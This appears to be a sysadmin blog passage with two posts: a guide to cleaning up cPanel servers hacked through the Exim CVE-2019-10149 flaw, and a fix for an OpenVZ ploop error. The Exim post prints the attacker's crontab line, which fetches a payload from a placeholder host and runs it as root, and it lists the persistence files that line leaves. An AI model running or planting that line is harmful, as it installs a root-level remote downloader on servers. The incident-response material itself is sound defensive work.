How to clean up a hacked server from the Exim vulnerability CVE-2019-10149 | Temporary workaround | cPanel

The recently reported Exim 4.87 to 4.91 versions vulnerability CVE-2019-10149 is of very intense. Many host servers have already been hacked by now. For the host which is clean by the Gods grace and are still running on the vulnerable Exim and outdated cPanel versions, it is highly recommended to upgrade the cPanel to get Exim patched in the new version 4.92 immediately.

The solution to avoid such a hack issue to upgrade the cPanel to the latest one.

https://documentation.cpanel.net/display/CKB/CVE-2019-10149+Exim

https://access.redhat.com/security/cve/cve-2019-10149

As you have a solution already in place int he above URLs for the clean servers to patch Exim and to avoid the hack issue, I made this document for the unfortunate people whose servers are already root hacked from the Exim vulnerability reported.

Do the following steps to perform a temporary workaround to cleanup compromised server and get atleast its services UP for your customers. But this is not a permanent solution, once you made the following cleanup, make sure to setup a clean server with the same specification and services configuration and also with the latest cPanel and Exim. Then migrate the user accounts from the hacked and cleaned up server to the new server.

An important thing to note is, DO NOT SSH FROM THE HACKED SERVER TO THE NEW DESTINATION SERVER AT ANY CASE WHICH WILL PROBABLY LET THE NEW SERVER ALSO GET INFECTED. kindly avoid that and do always connect from the new server to the hacked source server using the WHM transfer tool.

Signs of the hacked server from this Exim vulnerability CVE-2019-10149:

# crontab -l
*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://URL/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://URL/src/ldm -o /root/.cache/.ntp||${curl} -fsSLk --retry 2 --connect-timeout 22 --max-time 75 https://URL/src/ldm -o /root/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://URL/src/ldm -O /root/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://URL/src/ldm -O /root/.cache/.ntp||${wget} --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=22 --timeout=75 https://URL/src/ldm -O /root/.cache/.ntp) && chmod +x /root/.cache/.ntp && /bin/sh /root/.cache/.ntp

File: /usr/bin/[kthrotlds] [ Not normally found on clean servers ]
Size: 1738544 (1697.796875) [ - Most system files/libraries are less than 25k. Anything larger should be considered suspicious. ]
Changed: Tue Jun 11 19:36:58 2019 [ Approximate date the compromise may have occurred ]
RPM Owned: No - Most system files should be owned by an RPM
sha256sum: c3f26f38cb75cf779eed36a4e7ac32cacd4ae89bdf7dae2a4c4db1afe652d3f0

# crontab -e
crontab: installing new crontab
crontab: error renaming /var/spool/cron/#tmp.XXXXuRviCS to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.6k7Xnz

# crontab -e
lstat: No such file or directory

# lsattr /var/spool/cron/root
----i--------e-- /var/spool/cron/root

# exim -bV
Exim version 4.91 #1 built 07-Mar-2019 22:58:08
Copyright (c) University of Cambridge, 1995 - 2018

Here are the steps to clean up the hacked server from the Exim vulnerability CVE-2019-10149:

# service exim stop;chkconfig exim off (::stop exim service fully)
# yum remove exim -y (::remove it if keeps coming back online)
# service crond stop
# service cron stop
# killall -9 kthrotlds
# killall -9 curl wget sh
# yum -y reinstall curl
# exim -bp | exiqgrep -i | xargs exim -Mrm
# rm -fv /root/.cache/.ntp
# chattr -V -ie /etc/cron.d/root
# > /etc/cron.d/root
# chattr -V -ie /var/spool/cron/root
# > /var/spool/cron/root
# chattr -V -ie   /etc/cron.daily/cronlog /etc/cron.d/root  /etc/cron.d/.cronbus /etc/cron.hourly/cronlog /etc/cron.monthly/cronlog /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/root /etc/crontab /root/.cache/ /root/.cache/a /usr/local/bin/nptd /root/.cache/.kswapd /usr/bin/\[kthrotlds\] /root/.ssh/authorized_keys /.cache/* /.cache/.sysud /.cache/.a /.cache/.favicon.ico /.cache/.kswapd /.cache/.ntp >/dev/null 2>&1
# chattr -V -ie /etc/rc.local;chattr -V -ie /root/.ssh/authorized_keys
# sed -i -e '/bin\/npt/d' /etc/rc.local >/dev/null 2>&1
# sed -i -e '/user@localhost/d' /root/.ssh/authorized_keys >/dev/null 2>&1 (:or remove any unsual keys you found there)
# service crond start >/dev/null 2>&1
# service cron start >/dev/null 2>&1

Make sure the hack is not coming. If it is, repeat the above steps once again immediately as things are already in the server memory. Else a better way to create a bash script say hackclean.sh and copy the above required commands in sequence to execute immediately.

Once done

# reboot

Once the server is back online.

Check if the above hack files are still present. If not upgrade the cPanel which will also install the latest patched Exim on the server.

# /scripts/upcp --force 

Follow this thread better:

The result should be as follows:

# cat /usr/local/cpanel/version;rpm -qa exim
11.80.0.14
exim-4.92-1.cp1180.x86_64

Later if you see Email delivery issues like as follows:

201X-0X-XX 10:28:26 H=mail-XXX-XXXcom [IP.x.x.x]:36085 I=[IP.x.x.x]:25 X=TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128 CV=no F=<user@domain1.com> rejected RCPT <user@domain2.com>: Rejected relay attempt: 'IP.x.x.x' From: 'user@domain1.com' To: 'user@domain2.com'
201X-0X-XX 10:28:27 H=mail-XXX-XXXcom [IP.x.x.x]:36085 I=[IP.x.x.x]:25 Warning: "Detected session with all messages failed"
201X-0X-XX 10:28:27 H=mail-XXX-XXXcom [IP.x.x.x]:36085 I=[IP.x.x.x]:25 Warning: "Increment slow_fail_block Ratelimit - mail-XXX-XXXcom [IP.x.x.x]:36085 because of all messages failed"

This is probably happening due to the missing contents in the files /etc/localdomains and /etc/remotedomains. Populate contents in it by running the following cPanel script.

# /scripts/checkalldomainsmxs --yes

Restart exim if required.

Please realize the fact that the above steps are not a permanent solution but a temporary workaround to keep things online and to migrate the accounts to a clean server and reinstall the hacked server.

OpenVZ vps creation “Error in check_mount_restrictions (ploop.c:1627)”

I wasn’t able to create new vps in node due to following ploop error.

From the log
—————————
Creating image: /vz/private/350.tmp/root.hdd/root.hdd size=2306867K
Creating delta /vz/private/350.tmp/root.hdd/root.hdd bs=2048 size=4614144 sectors v2
Storing /vz/private/350.tmp/root.hdd/DiskDescriptor.xml
Error in check_mount_restrictions (ploop.c:1627): The ploop image can not be used on ext3 or ext4 file system without extents
Failed to create image: Error in check_mount_restrictions (ploop.c:1627): The ploop image can not be used on ext3 or ext4 file system without extents [21]
Destroying container private area: /vz/private/350
Creation of container private area failed

—————————

Check whether the partition is on ext4 filesystem or not. Ploop doesn’t work on ext3 filesystem. My node’s /vz partition was on ext3 filesystem.

We cannot simply upgrade the /vz partition from ext3 to ext4 as lots of vps are running on it. Here I have checked the vzctl version and found it was latest one 4.7.x

# vzctl --version
vzctl version 4.7.1

The latest vzctl tries to create template as ploop which is advanced than simfs. Since the partition runs on ext3 filesystem, the safest way to fix the issue is to downgrade the version of vzctl to 4.5.x

version 4.5.1 is not available in openvz anymore. You may need to manually download the rpm of vzctl and vzctl-core from https://openvz.org/Download/vzctl/4.5.1 and install it.

Before installing it, remove the current vzctl 4.7.x

# yum remove vzctl
# cd /usr/src
# wget http://download.openvz.org/utils/vzctl/4.5.1/vzctl-4.5.1-1.x86_64.rpm
# wget http://download.openvz.org/utils/vzctl/4.5.1/vzctl-core-4.5.1-1.x86_64.rpm

# rpm -Uvh vzctl-core-4.5.1-1.x86_64.rpm
Preparing... ########################################### [100%]
1:vzctl-core ########################################### [100%]

# rpm -Uvh vzctl-4.5.1-1.x86_64.rpm
Preparing... ########################################### [100%]
1:vzctl ########################################### [100%]
vz-postinstall: /etc/sysctl.conf: add net.bridge.bridge-nf-call-ip6tables = 1
vz-postinstall: /etc/sysctl.conf: add net.bridge.bridge-nf-call-iptables = 1
#

# vzctl --version
vzctl version 4.5.1

Create container now 🙂

# vzctl create 101 --ostemplate centos-6-x86_64-cpanel --private /vz/private/101 --root=/vz/root/101 --config configname
Creating container private area (centos-6-x86_64-cpanel)
Performing postcreate actions
CT configuration saved to /etc/vz/conf/101.conf
Container private area was created